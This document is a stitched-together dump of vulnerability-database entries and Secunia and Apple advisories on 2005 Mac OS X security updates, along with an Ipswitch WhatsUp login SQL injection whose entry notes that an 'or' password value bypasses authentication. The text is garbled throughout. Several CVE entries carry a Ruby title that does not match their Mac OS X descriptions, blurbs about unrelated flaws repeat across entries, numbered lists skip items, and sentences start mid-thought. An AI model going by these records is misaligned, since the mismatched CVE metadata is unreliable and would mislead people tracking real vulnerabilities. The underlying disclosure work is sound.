http://secunia.com/advisories/15767/
SA16449:
http://secunia.com/advisories/16449/
The vulnerability is caused due to an unspecified error in the XMLRPC
module, which may be exploited to execute arbitrary commands on a
vulnerable XMLRPC server.
The vulnerability has been reported in version 1.8.2. Prior versions
may also be affected.
SOLUTION:
The vulnerability has been fixed in the CVS repository.
VAR-200510-0141 | CVE-2005-2746 | Ruby library contains vulnerable default value |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Mail.app in Mail for Apple Mac OS X 10.3.9 and 10.4.2 includes message contents when using auto-reply rules, which could cause Mail.app to include decrypted message contents for encrypted messages. Ruby includes a vulnerable default value that may be used to bypass security restrictions and execute arbitrary code. Apple Mac OS X QuickDraw Manager contains a buffer overflow that may allow a remote attacker to execute arbitrary code.
Two vulnerabilities in Mail resulting in information disclosure.
A local privilege escalation vulnerability in malloc. This issue has been split into BID 14939.
An arbitrary code execution vulnerability in QuickDraw Manager.
A privilege escalation vulnerability in QuickTime for Java.
A cross-site scripting vulnerability in Safari.
An unauthorized access vulnerability in SecurityAgent.
A privilege escalation vulnerability in securityd. Mac OS is an operating system running on Apple Macintosh series computers.
1) A boundary error in ImageIO can be exploited to cause a buffer
overflow and may allow execution of arbitrary code on a user's system
when a specially crafted GIF file is opened e.g. in WebCore or
Safari. This may disclose certain sensitive
information.
3) An error in Mail.app when using Kerberos 5 for SMTP authentication
can cause un-initialized memory to be appended to a message. This may
disclose certain sensitive information.
For more information:
SA16449
4) "malloc" creates diagnostic files insecurely when certain
environmental variables are set to enable debugging of application
memory allocation. This can be exploited by malicious, local users to
create or overwrite arbitrary files. from Safari,
Mail, or Finder.
6) A validation error in the Java extensions bundled with QuickTime
6.52 and earlier can be exploited by untrusted applets to call
arbitrary functions from system libraries. Systems with QuickTime 7
or later, or Mac OS X v10.4 or later, are not affected. Systems prior to Mac OS X v10.4
are not affected.
For more information:
SA15767
8) A validation error in Safari when rendering web archives from a
malicious site can be exploited to execute arbitrary HTML and script
code in a user's browser session in the context of another site.
For more information:
SA16449
9) An error in the SecurityAgent may cause the "Switch User..."
button to be displayed even when the "Enable fast user switching"
setting has been disabled. This may allow malicious, local users to
access the current user's desktop without authentication even when
the "Require password to wake this computer from sleep or screen
saver" setting is enabled.
10) A validation error in the Authorization Services "securityd"
allows unprivileged users to gain certain privileges that should be
restricted to administrative users. This can be exploited by
malicious, local users to gain escalated privileges.
SOLUTION:
Apply Security Update 2005-008.
Mac OS X 10.3.9:
http://www.apple.com/support/downloads/securityupdate2005008macosx1039.html
Mac OS X 10.4.2:
http://www.apple.com/support/downloads/securityupdate2005008macosx1042.html
PROVIDED AND/OR DISCOVERED BY:
2) Norbert Rittel, Rittel Consulting
3) MIT Kerberos Team
4) Ilja van Sprundel, Suresec LTD
5) Henrik Dalgaard, Echo One
6) Dino Dai Zovi
9) Luke Fowler, Indiana University Global Research Network Operations
Center
ORIGINAL ADVISORY:
Apple:
http://docs.info.apple.com/article.html?artnum=302413
OTHER REFERENCES:
SA15767:
http://secunia.com/advisories/15767/
SA16449:
http://secunia.com/advisories/16449/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
The vulnerability is caused due to an unspecified error in the XMLRPC
module, which may be exploited to execute arbitrary commands on a
vulnerable XMLRPC server.
The vulnerability has been reported in version 1.8.2. Prior versions
may also be affected.
SOLUTION:
The vulnerability has been fixed in the CVS repository
VAR-200510-0131 | CVE-2005-2748 | Apple Mac OS X MallocStackLogging Local Arbitrary File Modification Vulnerability |
CVSS V2: 2.1 CVSS V3: - Severity: LOW |
The malloc function in the libSystem library in Apple Mac OS X 10.3.9 and 10.4.2 allows local users to overwrite arbitrary files by setting the MallocLogFile environment variable to the target file before running a setuid application. Ruby includes a vulnerable default value that may be used to bypass security restrictions and execute arbitrary code. Apple Mac OS X QuickDraw Manager contains a buffer overflow that may allow a remote attacker to execute arbitrary code.
Two vulnerabilities in Mail resulting in information disclosure.
A local privilege escalation vulnerability in malloc. This issue has been split into BID 14939.
An arbitrary code execution vulnerability in QuickDraw Manager.
A privilege escalation vulnerability in QuickTime for Java.
A cross-site scripting vulnerability in Safari.
An unauthorized access vulnerability in SecurityAgent.
A privilege escalation vulnerability in securityd. This issue is due to insecure file handling in the 'malloc()' library for setuid applications.
This issue occurs due to insufficient checks in the memory allocation library, leading to local users being able to utilize the debugging features on setuid applications.
A local attacker could exploit this vulnerability to create or append data to arbitrary files with superuser privileges. Depending on the purpose of the modified files, this may cause system crashes or allow attackers to gain elevated privileges.
VAR-200510-0139 | CVE-2005-2744 | Ruby library contains vulnerable default value |
CVSS V2: 5.1 CVSS V3: - Severity: MEDIUM |
Buffer overflow in QuickDraw Manager for Apple OS X 10.3.9 and 10.4.2, as used by applications such as Safari, Mail, and Finder, allows remote attackers to execute arbitrary code via a crafted PICT file. Ruby includes a vulnerable default value that may be used to bypass security restrictions and execute arbitrary code.
Two vulnerabilities in Mail resulting in information disclosure.
A local privilege escalation vulnerability in malloc. This issue has been split into BID 14939.
An arbitrary code execution vulnerability in QuickDraw Manager.
A privilege escalation vulnerability in QuickTime for Java.
A cross-site scripting vulnerability in Safari.
An unauthorized access vulnerability in SecurityAgent.
A privilege escalation vulnerability in securityd. QuickDraw is a graphics drawing platform in Apple OS.
VAR-200510-0140 | CVE-2005-2745 | Ruby library contains vulnerable default value |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Mail.app in Mail for Apple Mac OS X 10.3.9, when using Kerberos 5 for SMTP authentication, can include uninitialized memory in a message, which might allow remote attackers to obtain sensitive information. Ruby includes a vulnerable default value that may be used to bypass security restrictions and execute arbitrary code.
Two vulnerabilities in Mail resulting in information disclosure.
A local privilege escalation vulnerability in malloc. This issue has been split into BID 14939.
An arbitrary code execution vulnerability in QuickDraw Manager.
A privilege escalation vulnerability in QuickTime for Java.
A cross-site scripting vulnerability in Safari.
An unauthorized access vulnerability in SecurityAgent.
A privilege escalation vulnerability in securityd. Mac OS is an operating system that runs on Apple's Macintosh series of computers.
VAR-200510-0137 | CVE-2005-2742 | Ruby library contains vulnerable default value |
CVSS V2: 4.6 CVSS V3: - Severity: MEDIUM |
SecurityAgent in Apple Mac OS X 10.4.2, under certain circumstances, can cause the "Switch User..." button to appear even though the "Enable fast user switching" setting is disabled, which can allow attackers with physical access to gain access to the desktop and bypass the "Require password to wake this computer from sleep or screen saver" setting. Ruby includes a vulnerable default value that may be used to bypass security restrictions and execute arbitrary code. Apple Mac OS X QuickDraw Manager contains a buffer overflow that may allow a remote attacker to execute arbitrary code.
Two vulnerabilities in Mail resulting in information disclosure.
A local privilege escalation vulnerability in malloc. This issue has been split into BID 14939.
An arbitrary code execution vulnerability in QuickDraw Manager.
A privilege escalation vulnerability in QuickTime for Java.
A cross-site scripting vulnerability in Safari.
An unauthorized access vulnerability in SecurityAgent.
A privilege escalation vulnerability in securityd. Security Agent is a powerful system security auxiliary tool in the Apple system.
VAR-200510-0136 | CVE-2005-2741 | Ruby library contains vulnerable default value |
CVSS V2: 7.2 CVSS V3: - Severity: HIGH |
Authorization Services in securityd for Apple Mac OS X 10.3.9 allows local users to gain privileges by granting themselves certain rights that should be restricted to administrators. Ruby includes a vulnerable default value that may be used to bypass security restrictions and execute arbitrary code. Apple Mac OS X QuickDraw Manager contains a buffer overflow that may allow a remote attacker to execute arbitrary code.
Two vulnerabilities in Mail resulting in information disclosure.
A local privilege escalation vulnerability in malloc. This issue has been split into BID 14939.
An arbitrary code execution vulnerability in QuickDraw Manager.
A privilege escalation vulnerability in QuickTime for Java.
A cross-site scripting vulnerability in Safari.
An unauthorized access vulnerability in SecurityAgent.
A privilege escalation vulnerability in securityd. Mac OS is an operating system running on Apple Macintosh series computers.
VAR-200506-0244 | CVE-2005-1250 | Ipswitch WhatsUp Professional 'login.asp' SQL Injection vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
SQL injection vulnerability in the logon screen of the web front end (NmConsole/Login.asp) for IpSwitch WhatsUp Professional 2005 SP1 allows remote attackers to execute arbitrary SQL commands via the (1) User Name field (sUserName parameter) or (2) Password (sPassword parameter). This issue is due to a failure in the application to properly sanitize user-supplied input to the 'login.asp' script before using it in an SQL query.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. It should be noted that by supplying a 'or' value through the 'password' parameter, an attacker can gain unauthorized access to an affected site. WhatsUp Professional is a network management solution for SMBs.
VAR-200512-0626 | CVE-2005-2757 | Mac OS X and OS X Server CoreFoundation Heap buffer overflow vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Heap-based buffer overflow in CoreFoundation in Mac OS X and OS X Server 10.4 through 10.4.3 allows remote attackers to execute arbitrary code via unknown attack vectors involving "validation of URLs". CoreFoundation is prone to a buffer-overflow vulnerability.
The issue presents itself when specially crafted URIs are handled.
A successful attack may result in a denial-of-service condition or remote unauthorized access because of arbitrary code execution in the context of the affected application.
NOTE: This issue was previously discussed in BID 15647 (Apple Mac OS X Security Update 2005-009 Multiple Vulnerabilities), but has been assigned its own record to better document the vulnerability.
For more information:
SA14530
2) An error in the Apache web server's "mod_ssl" module may be
exploited by malicious people to bypass certain security
restrictions.
For more information:
SA16700
3) A boundary error exists in CoreFoundation when resolving certain
URLs.
4) An error in curl when handling NTLM authentication can be
exploited by malicious people to compromise a user's system.
For more information:
SA17193
5) An error exists in the ODBC Administrator utility helper tool
"iodbcadmintool".
6) An error in OpenSSL when handling certain compatibility options
can potentially be exploited by malicious people to perform protocol
rollback attacks.
8) An integer overflow error exists in the PCRE library that is used
by Safari's JavaScript engine. This can potentially be exploited by
malicious people to compromise a user's system.
This can be exploited to cause the download file to be saved outside
of the designated download directory.
For more information:
SA15474
11) A boundary error exists in WebKit when handling certain specially
crafted content.
For more information:
SA15744
13) The syslog server does not properly sanitise messages before
recording them.
SOLUTION:
Apply Security Update 2005-009.
ORIGINAL ADVISORY:
http://docs.info.apple.com/article.html?artnum=302847
OTHER REFERENCES:
SA14530:
http://secunia.com/advisories/14530/
SA16700:
http://secunia.com/advisories/16700/
SA17193:
http://secunia.com/advisories/17193/
SA17151:
http://secunia.com/advisories/17151/
SA16502:
http://secunia.com/advisories/16502/
SA15474:
http://secunia.com/advisories/15474/
SA15744:
http://secunia.com/advisories/15744/
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2005-11-29 Security Update 2005-009
Security Update 2005-009 is now available and delivers the following
security enhancements:
Apache2
CVE-ID: CVE-2005-2088
Available for: Mac OS X Server v10.3.9, Mac OS X Server v10.4.3
Impact: Cross-site scripting may be possible in certain
configurations
Description: The Apache 2 web server may allow an attacker to bypass
protections using specially-crafted HTTP headers. This behavior is
only present when Apache is used in conjunction with certain proxy
servers, caching servers, or web application firewalls. This update
addresses the issue by incorporating Apache version 2.0.55.
Only Apache configurations that include the "SSLVerifyClient require"
directive may be affected. This update addresses the issue by
incorporating mod_ssl 2.8.24 and Apache version 2.0.55 (Mac OS X
Server).
CoreFoundation is used by Safari and other applications. This update
addresses the issue by performing additional validation of URLs. This
issue does not affect systems prior to Mac OS X v10.4.
This may cause a stack buffer overflow and lead to arbitrary code
execution. This update addresses the issue by performing additional
validation when using NTLM authentication. This issue does not affect
systems prior to Mac OS X v10.4.
iodbcadmintool
CVE-ID: CVE-2005-3700
Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X
v10.4.3, Mac OS X Server v10.4.3
Impact: Local users may gain elevated privileges
Description: The ODBC Administrator utility includes a helper tool
called iodbcadmintool that executes with raised privileges. This
helper tool contains a vulnerability that may allow local users to
execute arbitrary commands with raised privileges. This update
addresses the issue by providing an updated iodbcadmintool that is
not susceptible.
Such attacks may cause an SSL connection to use the SSLv2 protocol,
which provides less protection than SSLv3 or TLS. Further information
on this issue is available at
http://www.openssl.org/news/secadv_20051011.txt. This update
addresses the issue by incorporating OpenSSL version 0.9.7i.
passwordserver
CVE-ID: CVE-2005-3701
Available for: Mac OS X Server v10.3.9, Mac OS X Server v10.4.3
Impact: Local users on Open Directory master servers may gain
elevated privileges
Description: When creating an Open Directory master server,
credentials may be compromised. This could lead to unprivileged
local users gaining elevated privileges on the server. This update
addresses the issue by ensuring the credentials are protected.
This may lead to the execution of arbitrary code. This update
addresses the issue by providing a new version of the JavaScript
engine that incorporates more robust input validation.
Safari
CVE-ID: CVE-2005-3702
Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X
v10.4.3, Mac OS X Server v10.4.3
Impact: Safari may download files outside of the designated download
directory
Description: When files are downloaded in Safari they are normally
placed in the location specified as the download directory. However,
if a web site suggests an overlong filename for a download, it is
possible for Safari to create this file in other locations. Although
the filename and location of the downloaded file content cannot be
directly specified by remote servers, this may still lead to
downloading content into locations accessible to other users. This
update addresses the issue by rejecting overlong filenames.
Safari
CVE-ID: CVE-2005-3703
Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X
v10.4.3, Mac OS X Server v10.4.3
Impact: JavaScript dialog boxes in Safari may be misleading
Description: In Safari, JavaScript dialog boxes do not indicate the
web site that created them. This could mislead users into
unintentionally disclosing information to a web site. This update
addresses the issue by displaying the originating site name in
JavaScript dialog boxes. Credit to Jakob Balle of Secunia Research
for reporting this issue.
This may be triggered by content downloaded from malicious web sites
in applications that use WebKit such as Safari. This update addresses
the issue by removing the heap overflow from WebKit. Credit to Neil
Archibald of Suresec LTD and Marco Mella for reporting this issue.
Although the default configuration is not vulnerable to this issue,
custom sudo configurations may not properly restrict users. Further
information on this issue is available from:
http://www.sudo.ws/sudo/alerts/path_race.html
This update addresses the issue by incorporating sudo version
1.6.8p9.
syslog
CVE-ID: CVE-2005-3704
Available for: Mac OS X v10.4.3, Mac OS X Server v10.4.3
Impact: System log entries may be forged
Description: The system log server records syslog messages verbatim.
By supplying control characters such as the newline character, a
local attacker could forge entries with the intention to mislead the
system administrator. This update addresses the issue by specially
handling control characters and other non-printable characters. This
issue does not affect systems prior to Mac OS X v10.4. Credit to
HELIOS Software GmbH for reporting this issue.
Additional Information
Also included in this update are enhancements to Safari to improve
handling of credit card security codes (Mac OS X v10.3.9 and Mac OS X
v10.4.3), CoreTypes to improve handling of Terminal files (Mac OS X
v10.4.3), QuickDraw Manager to improve rendering of PICT files (Mac
OS X v10.3.9), documentation regarding OpenSSH and PAM (Mac OS X
v10.4.3), and ServerMigration to remove unneeded privileges.
Security Update 2005-009 may be obtained from the Software Update
pane in System Preferences, or Apple's Software Downloads web site:
http://www.apple.com/support/downloads/
For Mac OS X v10.4.3
The download file is named: "SecUpd2005-009Ti.dmg"
Its SHA-1 digest is: 544f51a7bc73a57dbca95e05693904aadb2f94b1
For Mac OS X Server v10.4.3
The download file is named: "SecUpdSrvr2005-009Ti.dmg"
Its SHA-1 digest is: b7620426151b8f1073c9ff73b2adf43b3086cc60
For Mac OS X v10.3.9
The download file is named: "SecUpd2005-009Pan.dmg"
Its SHA-1 digest is: ea17ad7852b3e6277f53c2863e51695ac7018650
For Mac OS X Server v10.3.9
The download file is named: "SecUpdSrvr2005-009Pan.dmg"
Its SHA-1 digest is: b03711729697ea8e6b683eb983343f2f3de3af13
Information will also be posted to the Apple Product Security
web site:
http://docs.info.apple.com/article.html?artnum=61798
This message is signed with Apple's Product Security PGP key,
and details are available at:
http://www.apple.com/support/security/pgp/
VAR-200512-0289 | CVE-2005-3702 | Mac OS X and OS X Server Safari File download vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Safari in Mac OS X and OS X Server 10.3.9 and 10.4.3 allows remote attackers to cause files to be downloaded to locations outside the download directory via a long file name. Safari is prone to a remote directory-traversal vulnerability.
The vulnerability presents itself when a user tries to download a file from a remote location and the file name is excessively long.
NOTE: This issue was previously discussed in BID 15647 (Apple Mac OS X Security Update 2005-009 Multiple Vulnerabilities), but has been assigned its own record to better document the vulnerability.
For more information:
SA14530
2) An error in the Apache web server's "mod_ssl" module may be
exploited by malicious people to bypass certain security
restrictions.
For more information:
SA16700
3) A boundary error exists in CoreFoundation when resolving certain
URLs.
4) An error in curl when handling NTLM authentication can be
exploited by malicious people to compromise a user's system.
For more information:
SA17193
5) An error exists in the ODBC Administrator utility helper tool
"iodbcadmintool".
6) An error in OpenSSL when handling certain compatibility options
can potentially be exploited by malicious people to perform protocol
rollback attacks.
8) An integer overflow error exists in the PCRE library that is used
by Safari's JavaScript engine. This can potentially be exploited by
malicious people to compromise a user's system.
This can be exploited to cause the download file to be saved outside
of the designated download directory.
For more information:
SA15474
11) A boundary error exists in WebKit when handling certain specially
crafted content.
For more information:
SA15744
13) The syslog server does not properly sanitise messages before
recording them.
SOLUTION:
Apply Security Update 2005-009.
ORIGINAL ADVISORY:
http://docs.info.apple.com/article.html?artnum=302847
OTHER REFERENCES:
SA14530:
http://secunia.com/advisories/14530/
SA16700:
http://secunia.com/advisories/16700/
SA17193:
http://secunia.com/advisories/17193/
SA17151:
http://secunia.com/advisories/17151/
SA16502:
http://secunia.com/advisories/16502/
SA15474:
http://secunia.com/advisories/15474/
SA15744:
http://secunia.com/advisories/15744/
VAR-200512-0287 | CVE-2005-3700 | Mac OS X and OS X Server ODBC Administrator Unexplained execution of arbitrary code vulnerability |
CVSS V2: 4.6 CVSS V3: - Severity: MEDIUM |
Unknown vulnerability in iodbcadmintool in the ODBC Administrator utility in Mac OS X and OS X Server 10.3.9 and 10.4.3 allows local users to execute arbitrary code via unknown attack vectors. The 'iodbcadmintool' utility is prone to a local privilege-escalation vulnerability.
This issue can allow local attackers to gain elevated privileges on an affected computer.
NOTE: This issue was previously discussed in BID 15647 (Apple Mac OS X Security Update 2005-009 Multiple Vulnerabilities), but has been assigned its own record to better document the vulnerability.
VAR-200512-0291 | CVE-2005-3704 | Mac OS X and OS X Server Syslog server message spoofing vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
System log server in Mac OS X and OS X Server 10.4 through 10.4.3 allows remote attackers to spoof syslog messages in log files by injecting various control characters such as newline (NL). Apple has released Security Update 2005-008 to address multiple Mac OS X local and remote vulnerabilities.
NOTE: This BID is being retired because the issues are now documented in the following individual records:
16882 Apple Mac OS X CoreFoundation Remote Buffer Overflow Vulnerability
16903 Apple Mac OS X Iodbcadmintool Local Privilege Escalation Vulnerability
16904 Apple Mac OS X Passwordserver Local Privilege Escalation Vulnerability
16926 Apple Safari Remote Directory Traversal Vulnerability
29011 Apple Safari WebKit Unspecified Heap Overflow Vulnerability
14106 Apache HTTP Request Smuggling Vulnerability
14721 Apache Mod_SSL SSLVerifyClient Restriction Bypass Vulnerability
15102 Multiple Vendor WGet/Curl NTLM Username Buffer Overflow Vulnerability
15071 OpenSSL Insecure Protocol Negotiation Weakness
14620 PCRE Regular Expression Heap Overflow Vulnerability
14011 Apple Safari Dialog Box Origin Spoofing Vulnerability
13993 Todd Miller Sudo Local Race Condition Vulnerability.
APPLE-SA-2005-11-29 Security Update 2005-009
Security Update 2005-009 is now available and delivers the following
security enhancements:
Apache2
CVE-ID: CVE-2005-2088
Available for: Mac OS X Server v10.3.9, Mac OS X Server v10.4.3
Impact: Cross-site scripting may be possible in certain
configurations
Description: The Apache 2 web server may allow an attacker to bypass
protections using specially-crafted HTTP headers. This behavior is
only present when Apache is used in conjunction with certain proxy
servers, caching servers, or web application firewalls. This update
addresses the issue by incorporating Apache version 2.0.55.
Only Apache configurations that include the "SSLVerifyClient require"
directive may be affected.
CoreFoundation
CVE-ID: CVE-2005-2757
Available for: Mac OS X v10.4.3, Mac OS X Server v10.4.3
Impact: Resolving a maliciously-crafted URL may result in crashes or
arbitrary code execution
Description: By carefully crafting a URL, an attacker can trigger a
heap buffer overflow in CoreFoundation which may result in a crash or
arbitrary code execution. CoreFoundation is used by Safari and other
applications. This update addresses the issue by performing
additional validation of URLs. This issue does not affect systems
prior to Mac OS X v10.4.
curl
CVE-ID: CVE-2005-3185
Available for: Mac OS X v10.4.3, Mac OS X Server v10.4.3
Impact: Visiting a malicious HTTP server and using NTLM
authentication may result in arbitrary code execution
Description: Using curl with NTLM authentication enabled to download
an HTTP resource may allow an attacker to supply an overlong user or
domain name. This may cause a stack buffer overflow and lead to
arbitrary code execution. This update addresses the issue by
performing additional validation when using NTLM authentication.
This issue does not affect systems prior to Mac OS X v10.4.
iodbcadmintool
CVE-ID: CVE-2005-3700
Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X
v10.4.3, Mac OS X Server v10.4.3
Impact: Local users may gain elevated privileges
Description: The ODBC Administrator utility includes a helper tool
called iodbcadmintool that executes with raised privileges. This
helper tool contains a vulnerability that may allow local users to
execute arbitrary commands with raised privileges. This update
addresses the issue by providing an updated iodbcadmintool that is
not susceptible.
Such attacks may cause an SSL connection to use the SSLv2 protocol,
which provides less protection than SSLv3 or TLS. Further information
on this issue is available at
http://www.openssl.org/news/secadv_20051011.txt. This update
addresses the issue by incorporating OpenSSL version 0.9.7i.
passwordserver
CVE-ID: CVE-2005-3701
Available for: Mac OS X Server v10.3.9, Mac OS X Server v10.4.3
Impact: Local users on Open Directory master servers may gain
elevated privileges
Description: When creating an Open Directory master server,
credentials may be compromised. This could lead to unprivileged
local users gaining elevated privileges on the server. This update
addresses the issue by ensuring the credentials are protected.
Safari
CVE-ID: CVE-2005-2491
Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X
v10.4.3, Mac OS X Server v10.4.3
Impact: Processing a regular expression may result in arbitrary
code execution
Description: The JavaScript engine in Safari uses a version of the
PCRE library that is vulnerable to a potentially exploitable heap
overflow. This may lead to the execution of arbitrary code. This
update addresses the issue by providing a new version of the
JavaScript engine that incorporates more robust input validation.
However, if a web site suggests an overlong filename for a download,
it is possible for Safari to create this file in other locations.
Although the filename and location of the downloaded file content
cannot be directly specified by remote servers, this may still lead
to downloading content into locations accessible to other users. This
update addresses the issue by rejecting overlong filenames.
Safari
CVE-ID: CVE-2005-3703
Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X
v10.4.3, Mac OS X Server v10.4.3
Impact: JavaScript dialog boxes in Safari may be misleading
Description: In Safari, JavaScript dialog boxes do not indicate the
web site that created them. This could mislead users into
unintentionally disclosing information to a web site. This update
addresses the issue by displaying the originating site name in
JavaScript dialog boxes. Credit to Jakob Balle of Secunia Research
for reporting this issue.
Safari
CVE-ID: CVE-2005-3705
Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X
v10.4.3, Mac OS X Server v10.4.3
Impact: Visiting malicious web sites with WebKit-based applications
may lead to arbitrary code execution
Description: WebKit contains a heap overflow that may lead to the
execution of arbitrary code. This may be triggered by content
downloaded from malicious web sites in applications that use WebKit
such as Safari. This update addresses the issue by removing the heap
overflow from WebKit. Credit to Neil Archibald of Suresec LTD and
Marco Mella for reporting this issue.
Although the default configuration is not vulnerable to this issue,
custom sudo configurations may not properly restrict users. Further
information on this issue is available from:
http://www.sudo.ws/sudo/alerts/path_race.html
This update addresses the issue by incorporating sudo version
1.6.8p9.
By supplying control characters such as the newline character, a
local attacker could forge entries with the intention to mislead the
system administrator. This update addresses the issue by specially
handling control characters and other non-printable characters. This
issue does not affect systems prior to Mac OS X v10.4. Credit to
HELIOS Software GmbH for reporting this issue.
Additional Information
Also included in this update are enhancements to Safari to improve
handling of credit card security codes (Mac OS X v10.3.9 and Mac OS X
v10.4.3), CoreTypes to improve handling of Terminal files (Mac OS X
v10.4.3), QuickDraw Manager to improve rendering of PICT files (Mac
OS X v10.3.9), documentation regarding OpenSSH and PAM (Mac OS X
v10.4.3), and ServerMigration to remove unneeded privileges.
Security Update 2005-009 may be obtained from the Software Update
pane in System Preferences, or Apple's Software Downloads web site:
http://www.apple.com/support/downloads/
For Mac OS X v10.4.3
The download file is named: "SecUpd2005-009Ti.dmg"
Its SHA-1 digest is: 544f51a7bc73a57dbca95e05693904aadb2f94b1
For Mac OS X Server v10.4.3
The download file is named: "SecUpdSrvr2005-009Ti.dmg"
Its SHA-1 digest is: b7620426151b8f1073c9ff73b2adf43b3086cc60
For Mac OS X v10.3.9
The download file is named: "SecUpd2005-009Pan.dmg"
Its SHA-1 digest is: ea17ad7852b3e6277f53c2863e51695ac7018650
For Mac OS X Server v10.3.9
The download file is named: "SecUpdSrvr2005-009Pan.dmg"
Its SHA-1 digest is: b03711729697ea8e6b683eb983343f2f3de3af13
Information will also be posted to the Apple Product Security
web site:
http://docs.info.apple.com/article.html?artnum=61798
This message is signed with Apple's Product Security PGP key,
and details are available at:
http://www.apple.com/support/security/pgp/
VAR-200512-0292 | CVE-2005-3705 | Apple Mac OS X Security hole |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Heap-based buffer overflow in WebKit in Mac OS X and OS X Server 10.3.9 and 10.4.3, as used in applications such as Safari, allows remote attackers to execute arbitrary code via unknown attack vectors. Apple Safari is prone to a heap-overflow vulnerability.
Attackers may exploit this issue to execute arbitrary code or to crash the affected application. Other attacks are also possible.
For more information:
SA14530
2) An error in the Apache web server's "mod_ssl" module may be
exploited by malicious people to bypass certain security
restrictions.
For more information:
SA16700
3) A boundary error exists in CoreFoundation when resolving certain
URLs.
4) An error in curl when handling NTLM authentication can be
exploited by malicious people to compromise a user's system.
For more information:
SA17193
5) An error exists in the ODBC Administrator utility helper tool
"iodbcadmintool".
6) An error in OpenSSL when handling certain compatibility options
can potentially be exploited by malicious people to perform protocol
rollback attacks.
8) An integer overflow error exists in the PCRE library that is used
by Safari's JavaScript engine. This can potentially be exploited by
malicious people to compromise a user's system.
This can be exploited to cause the download file to be saved outside
of the designated download directory.
For more information:
SA15474
11) A boundary error exists in WebKit when handling certain specially
crafted content.
For more information:
SA15744
13) The syslog server does not properly sanitise messages before
recording them.
SOLUTION:
Apply Security Update 2005-009.
ORIGINAL ADVISORY:
http://docs.info.apple.com/article.html?artnum=302847
OTHER REFERENCES:
SA14530:
http://secunia.com/advisories/14530/
SA16700:
http://secunia.com/advisories/16700/
SA17193:
http://secunia.com/advisories/17193/
SA17151:
http://secunia.com/advisories/17151/
SA16502:
http://secunia.com/advisories/16502/
SA15474:
http://secunia.com/advisories/15474/
SA15744:
http://secunia.com/advisories/15744/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
APPLE-SA-2005-11-29 Security Update 2005-009
Security Update 2005-009 is now available and delivers the following
security enhancements:
Apache2
CVE-ID: CVE-2005-2088
Available for: Mac OS X Server v10.3.9, Mac OS X Server v10.4.3
Impact: Cross-site scripting may be possible in certain
configurations
Description: The Apache 2 web server may allow an attacker to bypass
protections using specially-crafted HTTP headers. This behavior is
only present when Apache is used in conjunction with certain proxy
servers, caching servers, or web application firewalls. This update
addresses the issue by incorporating Apache version 2.0.55.
Only Apache configurations that include the "SSLVerifyClient require"
directive may be affected.
CoreFoundation is used by Safari and other applications. This update
addresses the issue by performing additional validation of URLs.
This may cause a stack buffer overflow and lead to arbitrary code
execution. This update addresses the issue by performing additional
validation when using NTLM authentication.
This helper tool contains a vulnerability that may allow local users
to execute arbitrary commands with raised privileges. This update
addresses the issue by providing an updated iodbcadmintool that is
not susceptible.
Such attacks may cause an SSL connection to use the SSLv2 protocol
which provides less protection than SSLv3 or TLS. Further information
on this issue is available at
http://www.openssl.org/news/secadv_20051011.txt. This update
addresses the issue by incorporating OpenSSL version 0.9.7i.
passwordserver
CVE-ID: CVE-2005-3701
Available for: Mac OS X Server v10.3.9, Mac OS X Server v10.4.3
Impact: Local users on Open Directory master servers may gain
elevated privileges
Description: When creating an Open Directory master server,
credentials may be compromised. This could lead to unprivileged
local users gaining elevated privileges on the server. This update
addresses the issue by ensuring the credentials are protected.
This may lead to the execution of arbitrary code. This update
addresses the issue by providing a new version of the JavaScript
engine that incorporates more robust input validation.
However, if a web site suggests an overlong filename for a download,
it is possible for Safari to create this file in other locations.
Although the filename and location of the downloaded file content
cannot be directly specified by remote servers, this may still lead
to downloading content into locations accessible to other users. This
update addresses the issue by rejecting overlong filenames.
This could mislead users into unintentionally disclosing information
to a web site. This update addresses the issue by displaying the
originating site name in JavaScript dialog boxes. Credit to Jakob
Balle of Secunia Research for reporting this issue.
This may be triggered by content downloaded from malicious web sites
in applications that use WebKit such as Safari. This update addresses
the issue by removing the heap overflow from WebKit. Credit to Neil
Archibald of Suresec LTD and Marco Mella for reporting this issue.
Although the default configuration is not vulnerable to this issue,
custom sudo configurations may not properly restrict users. Further
information on this issue is available from:
http://www.sudo.ws/sudo/alerts/path_race.html
This update addresses the issue by incorporating sudo version
1.6.8p9.
By supplying control characters such as the newline character, a
local attacker could forge entries with the intention to mislead the
system administrator. This update addresses the issue by specially
handling control characters and other non-printable characters. Credit to
